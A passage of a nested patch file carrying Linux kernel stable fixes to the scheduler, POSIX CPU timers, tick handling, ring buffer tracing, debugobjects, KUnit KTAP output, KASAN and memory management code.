+ 				     task_on_cpu(rq, task) ||
+ 				     !dl_task(task) ||
++				     is_migration_disabled(task) ||
+ 				     !task_on_rq_queued(task))) {
+ 				double_unlock_balance(rq, later_rq);
+ 				later_rq = NULL;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index f70c4a7fb4ef3..fa33c441ae867 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6475,7 +6475,7 @@ static int wake_affine(struct sched_domain *sd, struct task_struct *p,
+ 		target = wake_affine_weight(sd, p, this_cpu, prev_cpu, sync);
+ 
+ 	schedstat_inc(p->stats.nr_wakeups_affine_attempts);
+-	if (target == nr_cpumask_bits)
++	if (target != this_cpu)
+ 		return prev_cpu;
+ 
+ 	schedstat_inc(sd->ttwu_move_affine);
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 0a11f44adee57..4f5796dd26a56 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -2000,11 +2000,15 @@ static struct rq *find_lock_lowest_rq(struct task_struct *task, struct rq *rq)
+ 			 * the mean time, task could have
+ 			 * migrated already or had its affinity changed.
+ 			 * Also make sure that it wasn't scheduled on its rq.
++			 * It is possible the task was scheduled, set
++			 * "migrate_disabled" and then got preempted, so we must
++			 * check the task migration disable flag here too.
+ 			 */
+ 			if (unlikely(task_rq(task) != rq ||
+ 				     !cpumask_test_cpu(lowest_rq->cpu, &task->cpus_mask) ||
+ 				     task_on_cpu(rq, task) ||
+ 				     !rt_task(task) ||
++				     is_migration_disabled(task) ||
+ 				     !task_on_rq_queued(task))) {
+ 
+ 				double_unlock_balance(rq, lowest_rq);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8b..44b25ff35d28a 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -847,6 +847,8 @@ static u64 collect_timerqueue(struct timerqueue_head *head,
+ 			return expires;
+ 
+ 		ctmr->firing = 1;
++		/* See posix_cpu_timer_wait_running() */
++		rcu_assign_pointer(ctmr->handling, current);
+ 		cpu_timer_dequeue(ctmr);
+ 		list_add_tail(&ctmr->elist, firing);
+ 	}
+@@ -1162,7 +1164,49 @@ static void handle_posix_cpu_timers(struct task_struct *tsk);
+ #ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
+ static void posix_cpu_timers_work(struct callback_head *work)
+ {
++	struct posix_cputimers_work *cw = container_of(work, typeof(*cw), work);
++
++	mutex_lock(&cw->mutex);
+ 	handle_posix_cpu_timers(current);
++	mutex_unlock(&cw->mutex);
++}
++
++/*
++ * Invoked from the posix-timer core when a cancel operation failed because
++ * the timer is marked firing. The caller holds rcu_read_lock(), which
++ * protects the timer and the task which is expiring it from being freed.
++ */
++static void posix_cpu_timer_wait_running(struct k_itimer *timr)
++{
++	struct task_struct *tsk = rcu_dereference(timr->it.cpu.handling);
++
++	/* Has the handling task completed expiry already? */
++	if (!tsk)
++		return;
++
++	/* Ensure that the task cannot go away */
++	get_task_struct(tsk);
++	/* Now drop the RCU protection so the mutex can be locked */
++	rcu_read_unlock();
++	/* Wait on the expiry mutex */
++	mutex_lock(&tsk->posix_cputimers_work.mutex);
++	/* Release it immediately again. */
++	mutex_unlock(&tsk->posix_cputimers_work.mutex);
++	/* Drop the task reference. */
++	put_task_struct(tsk);
++	/* Relock RCU so the callsite is balanced */
++	rcu_read_lock();
++}
++
++static void posix_cpu_timer_wait_running_nsleep(struct k_itimer *timr)
++{
++	/* Ensure that timr->it.cpu.handling task cannot go away */
++	rcu_read_lock();
++	spin_unlock_irq(&timr->it_lock);
++	posix_cpu_timer_wait_running(timr);
++	rcu_read_unlock();
++	/* @timr is on stack and is valid */
++	spin_lock_irq(&timr->it_lock);
+ }
+ 
+ /*
+@@ -1178,6 +1222,7 @@ void clear_posix_cputimers_work(struct task_struct *p)
+ 	       sizeof(p->posix_cputimers_work.work));
+ 	init_task_work(&p->posix_cputimers_work.work,
+ 		       posix_cpu_timers_work);
++	mutex_init(&p->posix_cputimers_work.mutex);
+ 	p->posix_cputimers_work.scheduled = false;
+ }
+ 
+@@ -1256,6 +1301,18 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk)
+ 	lockdep_posixtimer_exit();
+ }
+ 
++static void posix_cpu_timer_wait_running(struct k_itimer *timr)
++{
++	cpu_relax();
++}
++
++static void posix_cpu_timer_wait_running_nsleep(struct k_itimer *timr)
++{
++	spin_unlock_irq(&timr->it_lock);
++	cpu_relax();
++	spin_lock_irq(&timr->it_lock);
++}
++
+ static inline bool posix_cpu_timers_work_scheduled(struct task_struct *tsk)
+ {
+ 	return false;
+@@ -1364,6 +1421,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
+ 		 */
+ 		if (likely(cpu_firing >= 0))
+ 			cpu_timer_fire(timer);
++		/* See posix_cpu_timer_wait_running() */
++		rcu_assign_pointer(timer->it.cpu.handling, NULL);
+ 		spin_unlock(&timer->it_lock);
+ 	}
+ }
+@@ -1498,23 +1557,16 @@ static int do_cpu_nanosleep(const clockid_t which_clock, int flags,
+ 		expires = cpu_timer_getexpires(&timer.it.cpu);
+ 		error = posix_cpu_timer_set(&timer, 0, &zero_it, &it);
+ 		if (!error) {
+-			/*
+-			 * Timer is now unarmed, deletion can not fail.
+-			 */
++			/* Timer is now unarmed, deletion can not fail. */
+ 			posix_cpu_timer_del(&timer);
++		} else {
++			while (error == TIMER_RETRY) {
++				posix_cpu_timer_wait_running_nsleep(&timer);
++				error = posix_cpu_timer_del(&timer);
++			}
+ 		}
+-		spin_unlock_irq(&timer.it_lock);
+ 
+-		while (error == TIMER_RETRY) {
+-			/*
+-			 * We need to handle case when timer was or is in the
+-			 * middle of firing. In other cases we already freed
+-			 * resources.
+-			 */
+-			spin_lock_irq(&timer.it_lock);
+-			error = posix_cpu_timer_del(&timer);
+-			spin_unlock_irq(&timer.it_lock);
+-		}
++		spin_unlock_irq(&timer.it_lock);
+ 
+ 		if ((it.it_value.tv_sec | it.it_value.tv_nsec) == 0) {
+ 			/*
+@@ -1624,6 +1676,7 @@ const struct k_clock clock_posix_cpu = {
+ 	.timer_del		= posix_cpu_timer_del,
+ 	.timer_get		= posix_cpu_timer_get,
+ 	.timer_rearm		= posix_cpu_timer_rearm,
++	.timer_wait_running	= posix_cpu_timer_wait_running,
+ };
+ 
+ const struct k_clock clock_process = {
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 0c8a87a11b39d..808a247205a9a 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -846,6 +846,10 @@ static struct k_itimer *timer_wait_running(struct k_itimer *timer,
+ 	rcu_read_lock();
+ 	unlock_timer(timer, *flags);
+ 
++	/*
++	 * kc->timer_wait_running() might drop RCU lock. So @timer
++	 * cannot be touched anymore after the function returns!
++	 */
+ 	if (!WARN_ON_ONCE(!kc->timer_wait_running))
+ 		kc->timer_wait_running(timer);
+ 
+diff --git a/kernel/time/tick-common.c b/kernel/time/tick-common.c
+index 46789356f856e..65b8658da829e 100644
+--- a/kernel/time/tick-common.c
++++ b/kernel/time/tick-common.c
+@@ -218,9 +218,19 @@ static void tick_setup_device(struct tick_device *td,
+ 		 * this cpu:
+ 		 */
+ 		if (tick_do_timer_cpu == TICK_DO_TIMER_BOOT) {
++			ktime_t next_p;
++			u32 rem;
++
+ 			tick_do_timer_cpu = cpu;
+ 
+-			tick_next_period = ktime_get();
++			next_p = ktime_get();
++			div_u64_rem(next_p, TICK_NSEC, &rem);
++			if (rem) {
++				next_p -= rem;
++				next_p += TICK_NSEC;
++			}
++
++			tick_next_period = next_p;
+ #ifdef CONFIG_NO_HZ_FULL
+ 			/*
+ 			 * The boot CPU may be nohz_full, in which case set
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index b0e3c9205946f..a46506f7ec6d0 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -281,6 +281,11 @@ static bool check_tick_dependency(atomic_t *dep)
+ 		return true;
+ 	}
+ 
++	if (val & TICK_DEP_MASK_RCU_EXP) {
++		trace_tick_stop(0, TICK_DEP_MASK_RCU_EXP);
++		return true;
++	}
++
+ 	return false;
+ }
+ 
+@@ -527,7 +532,7 @@ void __init tick_nohz_full_setup(cpumask_var_t cpumask)
+ 	tick_nohz_full_running = true;
+ }
+ 
+-static int tick_nohz_cpu_down(unsigned int cpu)
++bool tick_nohz_cpu_hotpluggable(unsigned int cpu)
+ {
+ 	/*
+ 	 * The tick_do_timer_cpu CPU handles housekeeping duty (unbound
+@@ -535,8 +540,13 @@ static int tick_nohz_cpu_down(unsigned int cpu)
+ 	 * CPUs. It must remain online when nohz full is enabled.
+ 	 */
+ 	if (tick_nohz_full_running && tick_do_timer_cpu == cpu)
+-		return -EBUSY;
+-	return 0;
++		return false;
++	return true;
++}
++
++static int tick_nohz_cpu_down(unsigned int cpu)
++{
++	return tick_nohz_cpu_hotpluggable(cpu) ? 0 : -EBUSY;
+ }
+ 
+ void __init tick_nohz_init(void)
+diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
+index f72b9f1de178e..221c8c404973a 100644
+--- a/kernel/time/timekeeping.c
++++ b/kernel/time/timekeeping.c
+@@ -526,7 +526,7 @@ EXPORT_SYMBOL_GPL(ktime_get_raw_fast_ns);
+  * partially updated.  Since the tk->offs_boot update is a rare event, this
+  * should be a rare occurrence which postprocessing should be able to handle.
+  *
+- * The caveats vs. timestamp ordering as documented for ktime_get_fast_ns()
++ * The caveats vs. timestamp ordering as documented for ktime_get_mono_fast_ns()
+  * apply as well.
+  */
+ u64 notrace ktime_get_boot_fast_ns(void)
+@@ -576,7 +576,7 @@ static __always_inline u64 __ktime_get_real_fast(struct tk_fast *tkf, u64 *mono)
+ /**
+  * ktime_get_real_fast_ns: - NMI safe and fast access to clock realtime.
+  *
+- * See ktime_get_fast_ns() for documentation of the time stamp ordering.
++ * See ktime_get_mono_fast_ns() for documentation of the time stamp ordering.
+  */
+ u64 ktime_get_real_fast_ns(void)
+ {
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 9d8538531a545..4acc27cb856f8 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1778,6 +1778,8 @@ static void rb_free_cpu_buffer(struct ring_buffer_per_cpu *cpu_buffer)
+ 	struct list_head *head = cpu_buffer->pages;
+ 	struct buffer_page *bpage, *tmp;
+ 
++	irq_work_sync(&cpu_buffer->irq_work.work);
++
+ 	free_buffer_page(cpu_buffer->reader_page);
+ 
+ 	if (head) {
+@@ -1884,6 +1886,8 @@ ring_buffer_free(struct trace_buffer *buffer)
+ 
+ 	cpuhp_state_remove_instance(CPUHP_TRACE_RB_PREPARE, &buffer->node);
+ 
++	irq_work_sync(&buffer->irq_work.work);
++
+ 	for_each_buffer_cpu(buffer, cpu)
+ 		rb_free_cpu_buffer(buffer->buffers[cpu]);
+ 
+@@ -5333,6 +5337,9 @@ void ring_buffer_reset_cpu(struct trace_buffer *buffer, int cpu)
+ }
+ EXPORT_SYMBOL_GPL(ring_buffer_reset_cpu);
+ 
++/* Flag to ensure proper resetting of atomic variables */
++#define RESET_BIT	(1 << 30)
++
+ /**
+  * ring_buffer_reset_online_cpus - reset a ring buffer per CPU buffer
+  * @buffer: The ring buffer to reset a per cpu buffer of
+@@ -5349,20 +5356,27 @@ void ring_buffer_reset_online_cpus(struct trace_buffer *buffer)
+ 	for_each_online_buffer_cpu(buffer, cpu) {
+ 		cpu_buffer = buffer->buffers[cpu];
+ 
+-		atomic_inc(&cpu_buffer->resize_disabled);
++		atomic_add(RESET_BIT, &cpu_buffer->resize_disabled);
+ 		atomic_inc(&cpu_buffer->record_disabled);
+ 	}
+ 
+ 	/* Make sure all commits have finished */
+ 	synchronize_rcu();
+ 
+-	for_each_online_buffer_cpu(buffer, cpu) {
++	for_each_buffer_cpu(buffer, cpu) {
+ 		cpu_buffer = buffer->buffers[cpu];
+ 
++		/*
++		 * If a CPU came online during the synchronize_rcu(), then
++		 * ignore it.
++		 */
++		if (!(atomic_read(&cpu_buffer->resize_disabled) & RESET_BIT))
++			continue;
++
+ 		reset_disabled_cpu_buffer(cpu_buffer);
+ 
+ 		atomic_dec(&cpu_buffer->record_disabled);
+-		atomic_dec(&cpu_buffer->resize_disabled);
++		atomic_sub(RESET_BIT, &cpu_buffer->resize_disabled);
+ 	}
+ 
+ 	mutex_unlock(&buffer->mutex);
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 3360d638071a1..5c1087df2f1c4 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9619,7 +9619,7 @@ init_tracer_tracefs(struct trace_array *tr, struct dentry *d_tracer)
+ 
+ 	tr->buffer_percent = 50;
+ 
+-	trace_create_file("buffer_percent", TRACE_MODE_READ, d_tracer,
++	trace_create_file("buffer_percent", TRACE_MODE_WRITE, d_tracer,
+ 			tr, &buffer_percent_fops);
+ 
+ 	create_trace_options_dir(tr);
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 908e8a13c675b..625cab4b9d945 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -1398,6 +1398,9 @@ static ssize_t user_events_write_core(struct file *file, struct iov_iter *i)
+ 	if (unlikely(copy_from_iter(&idx, sizeof(idx), i) != sizeof(idx)))
+ 		return -EFAULT;
+ 
++	if (idx < 0)
++		return -EINVAL;
++
+ 	rcu_read_lock_sched();
+ 
+ 	refs = rcu_dereference_sched(info->refs);
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 8e21c352c1558..4dd494f786bcd 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -4850,10 +4850,16 @@ static void show_one_worker_pool(struct worker_pool *pool)
+ 	struct worker *worker;
+ 	bool first = true;
+ 	unsigned long flags;
++	unsigned long hung = 0;
+ 
+ 	raw_spin_lock_irqsave(&pool->lock, flags);
+ 	if (pool->nr_workers == pool->nr_idle)
+ 		goto next_pool;
++
++	/* How long the first pending work is waiting for a worker. */
++	if (!list_empty(&pool->worklist))
++		hung = jiffies_to_msecs(jiffies - pool->watchdog_ts) / 1000;
++
+ 	/*
+ 	 * Defer printing to avoid deadlocks in console drivers that
+ 	 * queue work while holding locks also taken in their write
+@@ -4862,9 +4868,7 @@ static void show_one_worker_pool(struct worker_pool *pool)
+ 	printk_deferred_enter();
+ 	pr_info("pool %d:", pool->id);
+ 	pr_cont_pool_info(pool);
+-	pr_cont(" hung=%us workers=%d",
+-		jiffies_to_msecs(jiffies - pool->watchdog_ts) / 1000,
+-		pool->nr_workers);
++	pr_cont(" hung=%lus workers=%d", hung, pool->nr_workers);
+ 	if (pool->manager)
+ 		pr_cont(" manager: %d",
+ 			task_pid_nr(pool->manager->task));
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index 6f8e5dd1dcd0c..bdfd859cccaf2 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -216,10 +216,6 @@ static struct debug_obj *__alloc_object(struct hlist_head *list)
+ 	return obj;
+ }
+ 
+-/*
+- * Allocate a new object. If the pool is empty, switch off the debugger.
+- * Must be called with interrupts disabled.
+- */
+ static struct debug_obj *
+ alloc_object(void *addr, struct debug_bucket *b, const struct debug_obj_descr *descr)
+ {
+@@ -552,36 +548,74 @@ static void debug_object_is_on_stack(void *addr, int onstack)
+ 	WARN_ON(1);
+ }
+ 
+-static void
+-__debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
++static struct debug_obj *lookup_object_or_alloc(void *addr, struct debug_bucket *b,
++						const struct debug_obj_descr *descr,
++						bool onstack, bool alloc_ifstatic)
+ {
+-	enum debug_obj_state state;
+-	bool check_stack = false;
+-	struct debug_bucket *db;
+-	struct debug_obj *obj;
+-	unsigned long flags;
++	struct debug_obj *obj = lookup_object(addr, b);
++	enum debug_obj_state state = ODEBUG_STATE_NONE;
++
++	if (likely(obj))
++		return obj;
++
++	/*
++	 * debug_object_init() unconditionally allocates untracked
++	 * objects. It does not matter whether it is a static object or
++	 * not.
++	 *
++	 * debug_object_assert_init() and debug_object_activate() allow
++	 * allocation only if the descriptor callback confirms that the
++	 * object is static and considered initialized. For non-static
++	 * objects the allocation needs to be done from the fixup callback.
++	 */
++	if (unlikely(alloc_ifstatic)) {
++		if (!descr->is_static_object || !descr->is_static_object(addr))
++			return ERR_PTR(-ENOENT);
++		/* Statically allocated objects are considered initialized */
++		state = ODEBUG_STATE_INIT;
++	}
++
++	obj = alloc_object(addr, b, descr);
++	if (likely(obj)) {
++		obj->state = state;
++		debug_object_is_on_stack(addr, onstack);
++		return obj;
++	}
++
++	/* Out of memory. Do the cleanup outside of the locked region */
++	debug_objects_enabled = 0;
++	return NULL;
++}
+ 
++static void debug_objects_fill_pool(void)
++{
+ 	/*
+ 	 * On RT enabled kernels the pool refill must happen in preemptible
+ 	 * context:
+ 	 */
+ 	if (!IS_ENABLED(CONFIG_PREEMPT_RT) || preemptible())
+ 		fill_pool();
++}
++
++static void
++__debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
++{
++	enum debug_obj_state state;
++	struct debug_bucket *db;
++	struct debug_obj *obj;
++	unsigned long flags;
++
++	debug_objects_fill_pool();
+ 
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+-	obj = lookup_object(addr, db);
+-	if (!obj) {
+-		obj = alloc_object(addr, db, descr);
+-		if (!obj) {
+-			debug_objects_enabled = 0;
+-			raw_spin_unlock_irqrestore(&db->lock, flags);
+-			debug_objects_oom();
+-			return;
+-		}
+-		check_stack = true;
++	obj = lookup_object_or_alloc(addr, db, descr, onstack, false);
++	if (unlikely(!obj)) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		debug_objects_oom();
++		return;
+ 	}
+ 
+ 	switch (obj->state) {
+@@ -607,8 +641,6 @@ __debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (check_stack)
+-		debug_object_is_on_stack(addr, onstack);
+ }
+ 
+ /**
+@@ -648,24 +680,24 @@ EXPORT_SYMBOL_GPL(debug_object_init_on_stack);
+  */
+ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	enum debug_obj_state state;
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+ 	int ret;
+-	struct debug_obj o = { .object = addr,
+-			       .state = ODEBUG_STATE_NOTAVAILABLE,
+-			       .descr = descr };
+ 
+ 	if (!debug_objects_enabled)
+ 		return 0;
+ 
++	debug_objects_fill_pool();
++
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+-	obj = lookup_object(addr, db);
+-	if (obj) {
++	obj = lookup_object_or_alloc(addr, db, descr, false, true);
++	if (likely(!IS_ERR_OR_NULL(obj))) {
+ 		bool print_object = false;
+ 
+ 		switch (obj->state) {
+@@ -698,24 +730,16 @@ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+ 
+-	/*
+-	 * We are here when a static object is activated. We
+-	 * let the type specific code confirm whether this is
+-	 * true or not. if true, we just make sure that the
+-	 * static object is tracked in the object tracker. If
+-	 * not, this must be a bug, so we try to fix it up.
+-	 */
+-	if (descr->is_static_object && descr->is_static_object(addr)) {
+-		/* track this static object */
+-		debug_object_init(addr, descr);
+-		debug_object_activate(addr, descr);
+-	} else {
+-		debug_print_object(&o, "activate");
+-		ret = debug_object_fixup(descr->fixup_activate, addr,
+-					ODEBUG_STATE_NOTAVAILABLE);
+-		return ret ? 0 : -EINVAL;
++	/* If NULL the allocation has hit OOM */
++	if (!obj) {
++		debug_objects_oom();
++		return 0;
+ 	}
+-	return 0;
++
++	/* Object is neither static nor tracked. It's not initialized */
++	debug_print_object(&o, "activate");
++	ret = debug_object_fixup(descr->fixup_activate, addr, ODEBUG_STATE_NOTAVAILABLE);
++	return ret ? 0 : -EINVAL;
+ }
+ EXPORT_SYMBOL_GPL(debug_object_activate);
+ 
+@@ -869,6 +893,7 @@ EXPORT_SYMBOL_GPL(debug_object_free);
+  */
+ void debug_object_assert_init(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+@@ -876,34 +901,25 @@ void debug_object_assert_init(void *addr, const struct debug_obj_descr *descr)
+ 	if (!debug_objects_enabled)
+ 		return;
+ 
++	debug_objects_fill_pool();
++
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
++	obj = lookup_object_or_alloc(addr, db, descr, false, true);
++	raw_spin_unlock_irqrestore(&db->lock, flags);
++	if (likely(!IS_ERR_OR_NULL(obj)))
++		return;
+ 
+-	obj = lookup_object(addr, db);
++	/* If NULL the allocation has hit OOM */
+ 	if (!obj) {
+-		struct debug_obj o = { .object = addr,
+-				       .state = ODEBUG_STATE_NOTAVAILABLE,
+-				       .descr = descr };
+-
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		/*
+-		 * Maybe the object is static, and we let the type specific
+-		 * code confirm. Track this static object if true, else invoke
+-		 * fixup.
+-		 */
+-		if (descr->is_static_object && descr->is_static_object(addr)) {
+-			/* Track this static object */
+-			debug_object_init(addr, descr);
+-		} else {
+-			debug_print_object(&o, "assert_init");
+-			debug_object_fixup(descr->fixup_assert_init, addr,
+-					   ODEBUG_STATE_NOTAVAILABLE);
+-		}
++		debug_objects_oom();
+ 		return;
+ 	}
+ 
+-	raw_spin_unlock_irqrestore(&db->lock, flags);
++	/* Object is neither tracked nor static. It's not initialized. */
++	debug_print_object(&o, "assert_init");
++	debug_object_fixup(descr->fixup_assert_init, addr, ODEBUG_STATE_NOTAVAILABLE);
+ }
+ EXPORT_SYMBOL_GPL(debug_object_assert_init);
+ 
+diff --git a/lib/kunit/debugfs.c b/lib/kunit/debugfs.c
+index 1048ef1b8d6ec..b08bb1fba106d 100644
+--- a/lib/kunit/debugfs.c
++++ b/lib/kunit/debugfs.c
+@@ -55,15 +55,25 @@ static int debugfs_print_results(struct seq_file *seq, void *v)
+ 	enum kunit_status success = kunit_suite_has_succeeded(suite);
+ 	struct kunit_case *test_case;
+ 
+-	if (!suite || !suite->log)
++	if (!suite)
+ 		return 0;
+ 
+-	seq_printf(seq, "%s", suite->log);
++	/* Print KTAP header so the debugfs log can be parsed as valid KTAP. */
++	seq_puts(seq, "KTAP version 1\n");
++	seq_puts(seq, "1..1\n");
++
++	/* Print suite header because it is not stored in the test logs. */
++	seq_puts(seq, KUNIT_SUBTEST_INDENT "KTAP version 1\n");
++	seq_printf(seq, KUNIT_SUBTEST_INDENT "# Subtest: %s\n", suite->name);
++	seq_printf(seq, KUNIT_SUBTEST_INDENT "1..%zd\n", kunit_suite_num_test_cases(suite));
+ 
+ 	kunit_suite_for_each_test_case(suite, test_case)
+ 		debugfs_print_result(seq, suite, test_case);
+ 
+-	seq_printf(seq, "%s %d - %s\n",
++	if (suite->log)
++		seq_printf(seq, "%s", suite->log);
++
++	seq_printf(seq, "%s %d %s\n",
+ 		   kunit_status_to_ok_not_ok(success), 1, suite->name);
+ 	return 0;
+ }
+diff --git a/lib/kunit/executor.c b/lib/kunit/executor.c
+index 9bbc422c284bf..74982b83707ca 100644
+--- a/lib/kunit/executor.c
++++ b/lib/kunit/executor.c
+@@ -166,7 +166,7 @@ static void kunit_exec_run_tests(struct suite_set *suite_set)
+ {
+ 	size_t num_suites = suite_set->end - suite_set->start;
+ 
+-	pr_info("TAP version 14\n");
++	pr_info("KTAP version 1\n");
+ 	pr_info("1..%zu\n", num_suites);
+ 
+ 	__kunit_test_suites_init(suite_set->start, num_suites);
+@@ -177,8 +177,8 @@ static void kunit_exec_list_tests(struct suite_set *suite_set)
+ 	struct kunit_suite * const *suites;
+ 	struct kunit_case *test_case;
+ 
+-	/* Hack: print a tap header so kunit.py can find the start of KUnit output. */
+-	pr_info("TAP version 14\n");
++	/* Hack: print a ktap header so kunit.py can find the start of KUnit output. */
++	pr_info("KTAP version 1\n");
+ 
+ 	for (suites = suite_set->start; suites < suite_set->end; suites++)
+ 		kunit_suite_for_each_test_case((*suites), test_case) {
+diff --git a/lib/kunit/test.c b/lib/kunit/test.c
+index 2a6992fe7c3e4..184df6f701b48 100644
+--- a/lib/kunit/test.c
++++ b/lib/kunit/test.c
+@@ -149,9 +149,18 @@ EXPORT_SYMBOL_GPL(kunit_suite_num_test_cases);
+ 
+ static void kunit_print_suite_start(struct kunit_suite *suite)
+ {
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "# Subtest: %s",
++	/*
++	 * We do not log the test suite header as doing so would
++	 * mean debugfs display would consist of the test suite
++	 * header prior to individual test results.
++	 * Hence directly printk the suite status, and we will
++	 * separately seq_printf() the suite header for the debugfs
++	 * representation.
++	 */
++	pr_info(KUNIT_SUBTEST_INDENT "KTAP version 1\n");
++	pr_info(KUNIT_SUBTEST_INDENT "# Subtest: %s\n",
+ 		  suite->name);
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "1..%zd",
++	pr_info(KUNIT_SUBTEST_INDENT "1..%zd\n",
+ 		  kunit_suite_num_test_cases(suite));
+ }
+ 
+@@ -168,20 +177,19 @@ static void kunit_print_ok_not_ok(void *test_or_suite,
+ 
+ 	/*
+ 	 * We do not log the test suite results as doing so would
+-	 * mean debugfs display would consist of the test suite
+-	 * description and status prior to individual test results.
+-	 * Hence directly printk the suite status, and we will
+-	 * separately seq_printf() the suite status for the debugfs
++	 * mean debugfs display would consist of an incorrect test
++	 * number. Hence directly printk the suite result, and we will
++	 * separately seq_printf() the suite results for the debugfs
+ 	 * representation.
+ 	 */
+ 	if (suite)
+-		pr_info("%s %zd - %s%s%s\n",
++		pr_info("%s %zd %s%s%s\n",
+ 			kunit_status_to_ok_not_ok(status),
+ 			test_number, description, directive_header,
+ 			(status == KUNIT_SKIPPED) ? directive : "");
+ 	else
+ 		kunit_log(KERN_INFO, test,
+-			  KUNIT_SUBTEST_INDENT "%s %zd - %s%s%s",
++			  KUNIT_SUBTEST_INDENT "%s %zd %s%s%s",
+ 			  kunit_status_to_ok_not_ok(status),
+ 			  test_number, description, directive_header,
+ 			  (status == KUNIT_SKIPPED) ? directive : "");
+@@ -542,6 +550,8 @@ int kunit_run_tests(struct kunit_suite *suite)
+ 			/* Get initial param. */
+ 			param_desc[0] = '\0';
+ 			test.param_value = test_case->generate_params(NULL, param_desc);
++			kunit_log(KERN_INFO, &test, KUNIT_SUBTEST_INDENT KUNIT_SUBTEST_INDENT
++				  "KTAP version 1\n");
+ 			kunit_log(KERN_INFO, &test, KUNIT_SUBTEST_INDENT KUNIT_SUBTEST_INDENT
+ 				  "# Subtest: %s", test_case->name);
+ 
+@@ -555,7 +565,7 @@ int kunit_run_tests(struct kunit_suite *suite)
+ 
+ 				kunit_log(KERN_INFO, &test,
+ 					  KUNIT_SUBTEST_INDENT KUNIT_SUBTEST_INDENT
+-					  "%s %d - %s",
++					  "%s %d %s",
+ 					  kunit_status_to_ok_not_ok(test.status),
+ 					  test.param_index + 1, param_desc);
+ 
+diff --git a/mm/kasan/hw_tags.c b/mm/kasan/hw_tags.c
+index b22c4f461cb0b..cc9bc99e47cd1 100644
+--- a/mm/kasan/hw_tags.c
++++ b/mm/kasan/hw_tags.c
+@@ -225,7 +225,7 @@ static void init_vmalloc_pages(const void *start, unsigned long size)
+ 	const void *addr;
+ 
+ 	for (addr = start; addr < start + size; addr += PAGE_SIZE) {
+-		struct page *page = virt_to_page(addr);
++		struct page *page = vmalloc_to_page(addr);
+ 
+ 		clear_highpage_kasan_tagged(page);
+ 	}
+@@ -237,7 +237,7 @@ void *__kasan_unpoison_vmalloc(const void *start, unsigned long size,
+ 	u8 tag;
+ 	unsigned long redzone_start, redzone_size;
+ 
+-	if (!kasan_vmalloc_enabled() || !is_vmalloc_or_module_addr(start)) {
++	if (!kasan_vmalloc_enabled()) {
+ 		if (flags & KASAN_VMALLOC_INIT)
+ 			init_vmalloc_pages(start, size);
+ 		return (void *)start;
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index e132f70a059e8..7d36dd95d1fff 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -802,8 +802,10 @@ static int mbind_range(struct vma_iterator *vmi, struct vm_area_struct *vma,
+ 		vmstart = vma->vm_start;
+ 	}
+ 
+-	if (mpol_equal(vma_policy(vma), new_pol))
++	if (mpol_equal(vma_policy(vma), new_pol)) {
++		*prev = vma;
+ 		return 0;
++	}
+ 
+ 	pgoff = vma->vm_pgoff + ((vmstart - vma->vm_start) >> PAGE_SHIFT);
+ 	merged = vma_merge(vma->vm_mm, *prev, vmstart, vmend, vma->vm_flags,
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index dc66f6715bfc4..d18296109aa7e 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -1887,6 +1887,16 @@ retry:
+ 			}
+ 		}
+ 
++		/*
++		 * Folio is unmapped now so it cannot be newly pinned anymore.
